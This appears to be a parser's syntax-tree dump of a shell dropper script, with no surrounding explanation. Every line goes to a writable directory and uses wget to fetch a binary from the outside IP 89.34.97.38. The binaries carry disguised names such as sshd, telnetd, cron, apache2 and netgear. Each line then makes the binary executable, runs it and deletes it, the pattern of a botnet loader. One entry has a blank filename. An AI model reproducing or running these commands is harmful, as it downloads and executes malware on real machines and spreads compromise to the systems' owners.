ListNode(lineno=2, pos=(12, 143), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 98), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 98), word='http://89.34.97.38/netgear'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(98, 99)),
  CommandNode(lineno=2, pos=(100, 116), parts=[
    WordNode(lineno=2, pos=(100, 105), word='chmod'),
    WordNode(lineno=2, pos=(106, 108), word='+x'),
    WordNode(lineno=2, pos=(109, 116), word='netgear'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(116, 117)),
  CommandNode(lineno=2, pos=(118, 127), parts=[
    WordNode(lineno=2, pos=(118, 127), word='./netgear'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(127, 128)),
  CommandNode(lineno=2, pos=(129, 143), parts=[
    WordNode(lineno=2, pos=(129, 131), word='rm'),
    WordNode(lineno=2, pos=(132, 135), word='-rf'),
    WordNode(lineno=2, pos=(136, 143), word='netgear'),
  ]),
])
ListNode(lineno=3, pos=(144, 263), parts=[
  CommandNode(lineno=3, pos=(144, 151), parts=[
    WordNode(lineno=3, pos=(144, 146), word='cd'),
    WordNode(lineno=3, pos=(147, 151), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(152, 154)),
  CommandNode(lineno=3, pos=(155, 166), parts=[
    WordNode(lineno=3, pos=(155, 157), word='cd'),
    WordNode(lineno=3, pos=(158, 166), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(167, 169)),
  CommandNode(lineno=3, pos=(170, 177), parts=[
    WordNode(lineno=3, pos=(170, 172), word='cd'),
    WordNode(lineno=3, pos=(173, 177), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(178, 180)),
  CommandNode(lineno=3, pos=(181, 189), parts=[
    WordNode(lineno=3, pos=(181, 183), word='cd'),
    WordNode(lineno=3, pos=(184, 189), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(190, 192)),
  CommandNode(lineno=3, pos=(193, 197), parts=[
    WordNode(lineno=3, pos=(193, 195), word='cd'),
    WordNode(lineno=3, pos=(196, 197), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(197, 198)),
  CommandNode(lineno=3, pos=(199, 227), parts=[
    WordNode(lineno=3, pos=(199, 203), word='wget'),
    WordNode(lineno=3, pos=(204, 227), word='http://89.34.97.38/sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(227, 228)),
  CommandNode(lineno=3, pos=(229, 242), parts=[
    WordNode(lineno=3, pos=(229, 234), word='chmod'),
    WordNode(lineno=3, pos=(235, 237), word='+x'),
    WordNode(lineno=3, pos=(238, 242), word='sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(242, 243)),
  CommandNode(lineno=3, pos=(244, 250), parts=[
    WordNode(lineno=3, pos=(244, 250), word='./sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(250, 251)),
  CommandNode(lineno=3, pos=(252, 263), parts=[
    WordNode(lineno=3, pos=(252, 254), word='rm'),
    WordNode(lineno=3, pos=(255, 258), word='-rf'),
    WordNode(lineno=3, pos=(259, 263), word='sshd'),
  ]),
])
ListNode(lineno=4, pos=(264, 399), parts=[
  CommandNode(lineno=4, pos=(264, 271), parts=[
    WordNode(lineno=4, pos=(264, 266), word='cd'),
    WordNode(lineno=4, pos=(267, 271), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(272, 274)),
  CommandNode(lineno=4, pos=(275, 286), parts=[
    WordNode(lineno=4, pos=(275, 277), word='cd'),
    WordNode(lineno=4, pos=(278, 286), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(287, 289)),
  CommandNode(lineno=4, pos=(290, 297), parts=[
    WordNode(lineno=4, pos=(290, 292), word='cd'),
    WordNode(lineno=4, pos=(293, 297), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(298, 300)),
  CommandNode(lineno=4, pos=(301, 309), parts=[
    WordNode(lineno=4, pos=(301, 303), word='cd'),
    WordNode(lineno=4, pos=(304, 309), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(310, 312)),
  CommandNode(lineno=4, pos=(313, 317), parts=[
    WordNode(lineno=4, pos=(313, 315), word='cd'),
    WordNode(lineno=4, pos=(316, 317), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(317, 318)),
  CommandNode(lineno=4, pos=(319, 351), parts=[
    WordNode(lineno=4, pos=(319, 323), word='wget'),
    WordNode(lineno=4, pos=(324, 351), word='http://89.34.97.38/fatbitch'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(351, 352)),
  CommandNode(lineno=4, pos=(353, 370), parts=[
    WordNode(lineno=4, pos=(353, 358), word='chmod'),
    WordNode(lineno=4, pos=(359, 361), word='+x'),
    WordNode(lineno=4, pos=(362, 370), word='fatbitch'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(370, 371)),
  CommandNode(lineno=4, pos=(372, 382), parts=[
    WordNode(lineno=4, pos=(372, 382), word='./fatbitch'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(382, 383)),
  CommandNode(lineno=4, pos=(384, 399), parts=[
    WordNode(lineno=4, pos=(384, 386), word='rm'),
    WordNode(lineno=4, pos=(387, 390), word='-rf'),
    WordNode(lineno=4, pos=(391, 399), word='fatbitch'),
  ]),
])
ListNode(lineno=5, pos=(400, 519), parts=[
  CommandNode(lineno=5, pos=(400, 407), parts=[
    WordNode(lineno=5, pos=(400, 402), word='cd'),
    WordNode(lineno=5, pos=(403, 407), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(408, 410)),
  CommandNode(lineno=5, pos=(411, 422), parts=[
    WordNode(lineno=5, pos=(411, 413), word='cd'),
    WordNode(lineno=5, pos=(414, 422), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(423, 425)),
  CommandNode(lineno=5, pos=(426, 433), parts=[
    WordNode(lineno=5, pos=(426, 428), word='cd'),
    WordNode(lineno=5, pos=(429, 433), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(434, 436)),
  CommandNode(lineno=5, pos=(437, 445), parts=[
    WordNode(lineno=5, pos=(437, 439), word='cd'),
    WordNode(lineno=5, pos=(440, 445), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(446, 448)),
  CommandNode(lineno=5, pos=(449, 453), parts=[
    WordNode(lineno=5, pos=(449, 451), word='cd'),
    WordNode(lineno=5, pos=(452, 453), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(453, 454)),
  CommandNode(lineno=5, pos=(455, 483), parts=[
    WordNode(lineno=5, pos=(455, 459), word='wget'),
    WordNode(lineno=5, pos=(460, 483), word='http://89.34.97.38/bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(483, 484)),
  CommandNode(lineno=5, pos=(485, 498), parts=[
    WordNode(lineno=5, pos=(485, 490), word='chmod'),
    WordNode(lineno=5, pos=(491, 493), word='+x'),
    WordNode(lineno=5, pos=(494, 498), word='bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(498, 499)),
  CommandNode(lineno=5, pos=(500, 506), parts=[
    WordNode(lineno=5, pos=(500, 506), word='./bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(506, 507)),
  CommandNode(lineno=5, pos=(508, 519), parts=[
    WordNode(lineno=5, pos=(508, 510), word='rm'),
    WordNode(lineno=5, pos=(511, 514), word='-rf'),
    WordNode(lineno=5, pos=(515, 519), word='bash'),
  ]),
])
ListNode(lineno=6, pos=(520, 639), parts=[
  CommandNode(lineno=6, pos=(520, 527), parts=[
    WordNode(lineno=6, pos=(520, 522), word='cd'),
    WordNode(lineno=6, pos=(523, 527), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(528, 530)),
  CommandNode(lineno=6, pos=(531, 542), parts=[
    WordNode(lineno=6, pos=(531, 533), word='cd'),
    WordNode(lineno=6, pos=(534, 542), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(543, 545)),
  CommandNode(lineno=6, pos=(546, 553), parts=[
    WordNode(lineno=6, pos=(546, 548), word='cd'),
    WordNode(lineno=6, pos=(549, 553), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(554, 556)),
  CommandNode(lineno=6, pos=(557, 565), parts=[
    WordNode(lineno=6, pos=(557, 559), word='cd'),
    WordNode(lineno=6, pos=(560, 565), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(566, 568)),
  CommandNode(lineno=6, pos=(569, 573), parts=[
    WordNode(lineno=6, pos=(569, 571), word='cd'),
    WordNode(lineno=6, pos=(572, 573), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(573, 574)),
  CommandNode(lineno=6, pos=(575, 603), parts=[
    WordNode(lineno=6, pos=(575, 579), word='wget'),
    WordNode(lineno=6, pos=(580, 603), word='http://89.34.97.38/tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(603, 604)),
  CommandNode(lineno=6, pos=(605, 618), parts=[
    WordNode(lineno=6, pos=(605, 610), word='chmod'),
    WordNode(lineno=6, pos=(611, 613), word='+x'),
    WordNode(lineno=6, pos=(614, 618), word='tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(618, 619)),
  CommandNode(lineno=6, pos=(620, 626), parts=[
    WordNode(lineno=6, pos=(620, 626), word='./tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(626, 627)),
  CommandNode(lineno=6, pos=(628, 639), parts=[
    WordNode(lineno=6, pos=(628, 630), word='rm'),
    WordNode(lineno=6, pos=(631, 634), word='-rf'),
    WordNode(lineno=6, pos=(635, 639), word='tftp'),
  ]),
])
ListNode(lineno=7, pos=(640, 759), parts=[
  CommandNode(lineno=7, pos=(640, 647), parts=[
    WordNode(lineno=7, pos=(640, 642), word='cd'),
    WordNode(lineno=7, pos=(643, 647), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(648, 650)),
  CommandNode(lineno=7, pos=(651, 662), parts=[
    WordNode(lineno=7, pos=(651, 653), word='cd'),
    WordNode(lineno=7, pos=(654, 662), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(663, 665)),
  CommandNode(lineno=7, pos=(666, 673), parts=[
    WordNode(lineno=7, pos=(666, 668), word='cd'),
    WordNode(lineno=7, pos=(669, 673), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(674, 676)),
  CommandNode(lineno=7, pos=(677, 685), parts=[
    WordNode(lineno=7, pos=(677, 679), word='cd'),
    WordNode(lineno=7, pos=(680, 685), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(686, 688)),
  CommandNode(lineno=7, pos=(689, 693), parts=[
    WordNode(lineno=7, pos=(689, 691), word='cd'),
    WordNode(lineno=7, pos=(692, 693), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(693, 694)),
  CommandNode(lineno=7, pos=(695, 723), parts=[
    WordNode(lineno=7, pos=(695, 699), word='wget'),
    WordNode(lineno=7, pos=(700, 723), word='http://89.34.97.38/wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(723, 724)),
  CommandNode(lineno=7, pos=(725, 738), parts=[
    WordNode(lineno=7, pos=(725, 730), word='chmod'),
    WordNode(lineno=7, pos=(731, 733), word='+x'),
    WordNode(lineno=7, pos=(734, 738), word='wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(738, 739)),
  CommandNode(lineno=7, pos=(740, 746), parts=[
    WordNode(lineno=7, pos=(740, 746), word='./wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(746, 747)),
  CommandNode(lineno=7, pos=(748, 759), parts=[
    WordNode(lineno=7, pos=(748, 750), word='rm'),
    WordNode(lineno=7, pos=(751, 754), word='-rf'),
    WordNode(lineno=7, pos=(755, 759), word='wget'),
  ]),
])
ListNode(lineno=8, pos=(760, 879), parts=[
  CommandNode(lineno=8, pos=(760, 767), parts=[
    WordNode(lineno=8, pos=(760, 762), word='cd'),
    WordNode(lineno=8, pos=(763, 767), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(768, 770)),
  CommandNode(lineno=8, pos=(771, 782), parts=[
    WordNode(lineno=8, pos=(771, 773), word='cd'),
    WordNode(lineno=8, pos=(774, 782), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(783, 785)),
  CommandNode(lineno=8, pos=(786, 793), parts=[
    WordNode(lineno=8, pos=(786, 788), word='cd'),
    WordNode(lineno=8, pos=(789, 793), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(794, 796)),
  CommandNode(lineno=8, pos=(797, 805), parts=[
    WordNode(lineno=8, pos=(797, 799), word='cd'),
    WordNode(lineno=8, pos=(800, 805), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(806, 808)),
  CommandNode(lineno=8, pos=(809, 813), parts=[
    WordNode(lineno=8, pos=(809, 811), word='cd'),
    WordNode(lineno=8, pos=(812, 813), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(813, 814)),
  CommandNode(lineno=8, pos=(815, 843), parts=[
    WordNode(lineno=8, pos=(815, 819), word='wget'),
    WordNode(lineno=8, pos=(820, 843), word='http://89.34.97.38/cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(843, 844)),
  CommandNode(lineno=8, pos=(845, 858), parts=[
    WordNode(lineno=8, pos=(845, 850), word='chmod'),
    WordNode(lineno=8, pos=(851, 853), word='+x'),
    WordNode(lineno=8, pos=(854, 858), word='cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(858, 859)),
  CommandNode(lineno=8, pos=(860, 866), parts=[
    WordNode(lineno=8, pos=(860, 866), word='./cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(866, 867)),
  CommandNode(lineno=8, pos=(868, 879), parts=[
    WordNode(lineno=8, pos=(868, 870), word='rm'),
    WordNode(lineno=8, pos=(871, 874), word='-rf'),
    WordNode(lineno=8, pos=(875, 879), word='cron'),
  ]),
])
ListNode(lineno=9, pos=(880, 995), parts=[
  CommandNode(lineno=9, pos=(880, 887), parts=[
    WordNode(lineno=9, pos=(880, 882), word='cd'),
    WordNode(lineno=9, pos=(883, 887), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(888, 890)),
  CommandNode(lineno=9, pos=(891, 902), parts=[
    WordNode(lineno=9, pos=(891, 893), word='cd'),
    WordNode(lineno=9, pos=(894, 902), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(903, 905)),
  CommandNode(lineno=9, pos=(906, 913), parts=[
    WordNode(lineno=9, pos=(906, 908), word='cd'),
    WordNode(lineno=9, pos=(909, 913), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(914, 916)),
  CommandNode(lineno=9, pos=(917, 925), parts=[
    WordNode(lineno=9, pos=(917, 919), word='cd'),
    WordNode(lineno=9, pos=(920, 925), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(926, 928)),
  CommandNode(lineno=9, pos=(929, 933), parts=[
    WordNode(lineno=9, pos=(929, 931), word='cd'),
    WordNode(lineno=9, pos=(932, 933), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(933, 934)),
  CommandNode(lineno=9, pos=(935, 962), parts=[
    WordNode(lineno=9, pos=(935, 939), word='wget'),
    WordNode(lineno=9, pos=(940, 962), word='http://89.34.97.38/ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(962, 963)),
  CommandNode(lineno=9, pos=(964, 976), parts=[
    WordNode(lineno=9, pos=(964, 969), word='chmod'),
    WordNode(lineno=9, pos=(970, 972), word='+x'),
    WordNode(lineno=9, pos=(973, 976), word='ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(976, 977)),
  CommandNode(lineno=9, pos=(978, 983), parts=[
    WordNode(lineno=9, pos=(978, 983), word='./ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(983, 984)),
  CommandNode(lineno=9, pos=(985, 995), parts=[
    WordNode(lineno=9, pos=(985, 987), word='rm'),
    WordNode(lineno=9, pos=(988, 991), word='-rf'),
    WordNode(lineno=9, pos=(992, 995), word='ftp'),
  ]),
])
ListNode(lineno=10, pos=(996, 1115), parts=[
  CommandNode(lineno=10, pos=(996, 1003), parts=[
    WordNode(lineno=10, pos=(996, 998), word='cd'),
    WordNode(lineno=10, pos=(999, 1003), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1004, 1006)),
  CommandNode(lineno=10, pos=(1007, 1018), parts=[
    WordNode(lineno=10, pos=(1007, 1009), word='cd'),
    WordNode(lineno=10, pos=(1010, 1018), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1019, 1021)),
  CommandNode(lineno=10, pos=(1022, 1029), parts=[
    WordNode(lineno=10, pos=(1022, 1024), word='cd'),
    WordNode(lineno=10, pos=(1025, 1029), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1030, 1032)),
  CommandNode(lineno=10, pos=(1033, 1041), parts=[
    WordNode(lineno=10, pos=(1033, 1035), word='cd'),
    WordNode(lineno=10, pos=(1036, 1041), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1042, 1044)),
  CommandNode(lineno=10, pos=(1045, 1049), parts=[
    WordNode(lineno=10, pos=(1045, 1047), word='cd'),
    WordNode(lineno=10, pos=(1048, 1049), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1049, 1050)),
  CommandNode(lineno=10, pos=(1051, 1079), parts=[
    WordNode(lineno=10, pos=(1051, 1055), word='wget'),
    WordNode(lineno=10, pos=(1056, 1079), word='http://89.34.97.38/cock'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1079, 1080)),
  CommandNode(lineno=10, pos=(1081, 1094), parts=[
    WordNode(lineno=10, pos=(1081, 1086), word='chmod'),
    WordNode(lineno=10, pos=(1087, 1089), word='+x'),
    WordNode(lineno=10, pos=(1090, 1094), word='cock'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1094, 1095)),
  CommandNode(lineno=10, pos=(1096, 1102), parts=[
    WordNode(lineno=10, pos=(1096, 1102), word='./cock'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1102, 1103)),
  CommandNode(lineno=10, pos=(1104, 1115), parts=[
    WordNode(lineno=10, pos=(1104, 1106), word='rm'),
    WordNode(lineno=10, pos=(1107, 1110), word='-rf'),
    WordNode(lineno=10, pos=(1111, 1115), word='cock'),
  ]),
])
ListNode(lineno=11, pos=(1116, 1227), parts=[
  CommandNode(lineno=11, pos=(1116, 1123), parts=[
    WordNode(lineno=11, pos=(1116, 1118), word='cd'),
    WordNode(lineno=11, pos=(1119, 1123), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1124, 1126)),
  CommandNode(lineno=11, pos=(1127, 1138), parts=[
    WordNode(lineno=11, pos=(1127, 1129), word='cd'),
    WordNode(lineno=11, pos=(1130, 1138), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1139, 1141)),
  CommandNode(lineno=11, pos=(1142, 1149), parts=[
    WordNode(lineno=11, pos=(1142, 1144), word='cd'),
    WordNode(lineno=11, pos=(1145, 1149), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1150, 1152)),
  CommandNode(lineno=11, pos=(1153, 1161), parts=[
    WordNode(lineno=11, pos=(1153, 1155), word='cd'),
    WordNode(lineno=11, pos=(1156, 1161), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1162, 1164)),
  CommandNode(lineno=11, pos=(1165, 1169), parts=[
    WordNode(lineno=11, pos=(1165, 1167), word='cd'),
    WordNode(lineno=11, pos=(1168, 1169), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1169, 1170)),
  CommandNode(lineno=11, pos=(1171, 1197), parts=[
    WordNode(lineno=11, pos=(1171, 1175), word='wget'),
    WordNode(lineno=11, pos=(1176, 1197), word='http://89.34.97.38/sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1197, 1198)),
  CommandNode(lineno=11, pos=(1199, 1210), parts=[
    WordNode(lineno=11, pos=(1199, 1204), word='chmod'),
    WordNode(lineno=11, pos=(1205, 1207), word='+x'),
    WordNode(lineno=11, pos=(1208, 1210), word='sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1210, 1211)),
  CommandNode(lineno=11, pos=(1212, 1216), parts=[
    WordNode(lineno=11, pos=(1212, 1216), word='./sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1216, 1217)),
  CommandNode(lineno=11, pos=(1218, 1227), parts=[
    WordNode(lineno=11, pos=(1218, 1220), word='rm'),
    WordNode(lineno=11, pos=(1221, 1224), word='-rf'),
    WordNode(lineno=11, pos=(1225, 1227), word='sh'),
  ]),
])
ListNode(lineno=12, pos=(1228, 1343), parts=[
  CommandNode(lineno=12, pos=(1228, 1235), parts=[
    WordNode(lineno=12, pos=(1228, 1230), word='cd'),
    WordNode(lineno=12, pos=(1231, 1235), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1236, 1238)),
  CommandNode(lineno=12, pos=(1239, 1250), parts=[
    WordNode(lineno=12, pos=(1239, 1241), word='cd'),
    WordNode(lineno=12, pos=(1242, 1250), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1251, 1253)),
  CommandNode(lineno=12, pos=(1254, 1261), parts=[
    WordNode(lineno=12, pos=(1254, 1256), word='cd'),
    WordNode(lineno=12, pos=(1257, 1261), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1262, 1264)),
  CommandNode(lineno=12, pos=(1265, 1273), parts=[
    WordNode(lineno=12, pos=(1265, 1267), word='cd'),
    WordNode(lineno=12, pos=(1268, 1273), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1274, 1276)),
  CommandNode(lineno=12, pos=(1277, 1281), parts=[
    WordNode(lineno=12, pos=(1277, 1279), word='cd'),
    WordNode(lineno=12, pos=(1280, 1281), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1281, 1282)),
  CommandNode(lineno=12, pos=(1283, 1310), parts=[
    WordNode(lineno=12, pos=(1283, 1287), word='wget'),
    WordNode(lineno=12, pos=(1288, 1310), word='http://89.34.97.38/ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1310, 1311)),
  CommandNode(lineno=12, pos=(1312, 1324), parts=[
    WordNode(lineno=12, pos=(1312, 1317), word='chmod'),
    WordNode(lineno=12, pos=(1318, 1320), word='+x'),
    WordNode(lineno=12, pos=(1321, 1324), word=' '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1324, 1325)),
  CommandNode(lineno=12, pos=(1326, 1331), parts=[
    WordNode(lineno=12, pos=(1326, 1331), word='./ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1331, 1332)),
  CommandNode(lineno=12, pos=(1333, 1343), parts=[
    WordNode(lineno=12, pos=(1333, 1335), word='rm'),
    WordNode(lineno=12, pos=(1336, 1339), word='-rf'),
    WordNode(lineno=12, pos=(1340, 1343), word=' '),
  ]),
])
ListNode(lineno=13, pos=(1344, 1475), parts=[
  CommandNode(lineno=13, pos=(1344, 1351), parts=[
    WordNode(lineno=13, pos=(1344, 1346), word='cd'),
    WordNode(lineno=13, pos=(1347, 1351), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1352, 1354)),
  CommandNode(lineno=13, pos=(1355, 1366), parts=[
    WordNode(lineno=13, pos=(1355, 1357), word='cd'),
    WordNode(lineno=13, pos=(1358, 1366), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1367, 1369)),
  CommandNode(lineno=13, pos=(1370, 1377), parts=[
    WordNode(lineno=13, pos=(1370, 1372), word='cd'),
    WordNode(lineno=13, pos=(1373, 1377), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1378, 1380)),
  CommandNode(lineno=13, pos=(1381, 1389), parts=[
    WordNode(lineno=13, pos=(1381, 1383), word='cd'),
    WordNode(lineno=13, pos=(1384, 1389), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1390, 1392)),
  CommandNode(lineno=13, pos=(1393, 1397), parts=[
    WordNode(lineno=13, pos=(1393, 1395), word='cd'),
    WordNode(lineno=13, pos=(1396, 1397), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1397, 1398)),
  CommandNode(lineno=13, pos=(1399, 1430), parts=[
    WordNode(lineno=13, pos=(1399, 1403), word='wget'),
    WordNode(lineno=13, pos=(1404, 1430), word='http://89.34.97.38/apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1430, 1431)),
  CommandNode(lineno=13, pos=(1432, 1448), parts=[
    WordNode(lineno=13, pos=(1432, 1437), word='chmod'),
    WordNode(lineno=13, pos=(1438, 1440), word='+x'),
    WordNode(lineno=13, pos=(1441, 1448), word='apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1448, 1449)),
  CommandNode(lineno=13, pos=(1450, 1459), parts=[
    WordNode(lineno=13, pos=(1450, 1459), word='./apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1459, 1460)),
  CommandNode(lineno=13, pos=(1461, 1475), parts=[
    WordNode(lineno=13, pos=(1461, 1463), word='rm'),
    WordNode(lineno=13, pos=(1464, 1467), word='-rf'),
    WordNode(lineno=13, pos=(1468, 1475), word='apache2'),
  ]),
])
ListNode(lineno=14, pos=(1476, 1607), parts=[
  CommandNode(lineno=14, pos=(1476, 1483), parts=[
    WordNode(lineno=14, pos=(1476, 1478), word='cd'),
    WordNode(lineno=14, pos=(1479, 1483), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1484, 1486)),
  CommandNode(lineno=14, pos=(1487, 1498), parts=[
    WordNode(lineno=14, pos=(1487, 1489), word='cd'),
    WordNode(lineno=14, pos=(1490, 1498), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1499, 1501)),
  CommandNode(lineno=14, pos=(1502, 1509), parts=[
    WordNode(lineno=14, pos=(1502, 1504), word='cd'),
    WordNode(lineno=14, pos=(1505, 1509), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1510, 1512)),
  CommandNode(lineno=14, pos=(1513, 1521), parts=[
    WordNode(lineno=14, pos=(1513, 1515), word='cd'),
    WordNode(lineno=14, pos=(1516, 1521), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1522, 1524)),
  CommandNode(lineno=14, pos=(1525, 1529), parts=[
    WordNode(lineno=14, pos=(1525, 1527), word='cd'),
    WordNode(lineno=14, pos=(1528, 1529), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1529, 1530)),
  CommandNode(lineno=14, pos=(1531, 1562), parts=[
    WordNode(lineno=14, pos=(1531, 1535), word='wget'),
    WordNode(lineno=14, pos=(1536, 1562), word='http://89.34.97.38/telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1562, 1563)),
  CommandNode(lineno=14, pos=(1564, 1580), parts=[
    WordNode(lineno=14, pos=(1564, 1569), word='chmod'),
    WordNode(lineno=14, pos=(1570, 1572), word='+x'),
    WordNode(lineno=14, pos=(1573, 1580), word='telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1580, 1581)),
  CommandNode(lineno=14, pos=(1582, 1591), parts=[
    WordNode(lineno=14, pos=(1582, 1591), word='./telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1591, 1592)),
  CommandNode(lineno=14, pos=(1593, 1607), parts=[
    WordNode(lineno=14, pos=(1593, 1595), word='rm'),
    WordNode(lineno=14, pos=(1596, 1599), word='-rf'),
    WordNode(lineno=14, pos=(1600, 1607), word='telnetd'),
  ]),
])
